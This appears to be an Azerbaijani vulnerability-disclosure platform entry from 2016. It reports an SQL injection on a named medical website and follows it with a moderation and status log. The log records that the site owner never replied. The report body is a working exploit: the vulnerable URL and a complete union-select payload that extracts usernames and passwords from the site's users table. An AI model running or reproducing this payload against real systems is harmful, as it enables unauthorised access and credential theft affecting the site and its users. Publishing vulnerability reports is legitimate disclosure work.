Ətraflı məlumat
Saytda SQL İnjection mövcuddur.
Bu boşluqdan istifadə edərək saytda yerləşdirilmiş məlumatları (Parollar, saytın strukturu və s. əldə etmək olar)
Sql inject here: http://www.medekspert.az/index.php?type=xestelik&cid=25
Sql manual adress ( Username & password): http://www.medekspert.az/index.php?type=xestelik&cid=-25'+union+select+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10+from+users--+-'
Qeydlər
-
02 Noyabr 2016, 13:36
Boşluğun statusu
Mənbədən cavab gəlmədi -
04 Oktyabr 2016, 10:06
Boşluğa bal verildi
Boşluğun tərcüməsi üçün tərcüməçiyə 7 bal verildi -
04 Oktyabr 2016, 10:06
Boşluğa bal verildi
Boşluğun tərcüməsinə görə müəllifə 1 bal verildi -
14 Sentyabr 2016, 10:53
Boşluğun statusu
Mənbəyə boşluq haqqında e-poçt göndərildi -
11 Sentyabr 2016, 13:48
Boşluğa bal verildi
Moderator boşluq üçün 10 ballıq qiymətləndirmə sistemi üzrə 7 bal təyin etdi -
11 Sentyabr 2016, 13:47
Boşluğun statusu
Moderator tərəfindən təsdiq edildi -
10 Sentyabr 2016, 16:12
Boşluq əlavə edildi
Boşluq BUGemota əlavə edildi